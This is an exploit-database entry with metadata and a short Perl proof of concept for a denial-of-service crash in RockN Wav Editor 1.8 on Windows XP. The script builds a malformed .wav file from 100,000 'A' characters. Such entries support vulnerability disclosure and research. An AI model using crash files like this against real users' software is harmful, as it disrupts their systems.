RockN Wav Editor 1.8 - Denial of Service
Author: d4rk-h4ck3r
type: dos
platform: windows
port:
date_added: 2010-08-18
date_updated: 2010-08-18
verified: 1
codes:
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt15000/14685.png
application_url: http://www.exploit-db.comRockN_WE.exe
# Exploit Title: RockN_Wav Editor 1.8 Buffer Overflow (POC)
# Author: d4rk-h4ck3r
# Date: 2010-08-18
# Software Link: http://www.brothersoft.com/rockn_wav-editor-23982.html
# Greetz 2 : PASSEWORD , KAiSER-J , sec4ever , tli7a , All Tun!Sian h4ck3rz
# Spacial thanks 2 : MadjiX
# Tested on: Windows XP SP3 Fr
$buff="A" x 100000;
open (myfile , ">>d4rk.wav");
print myfile $buff;
close (myfile);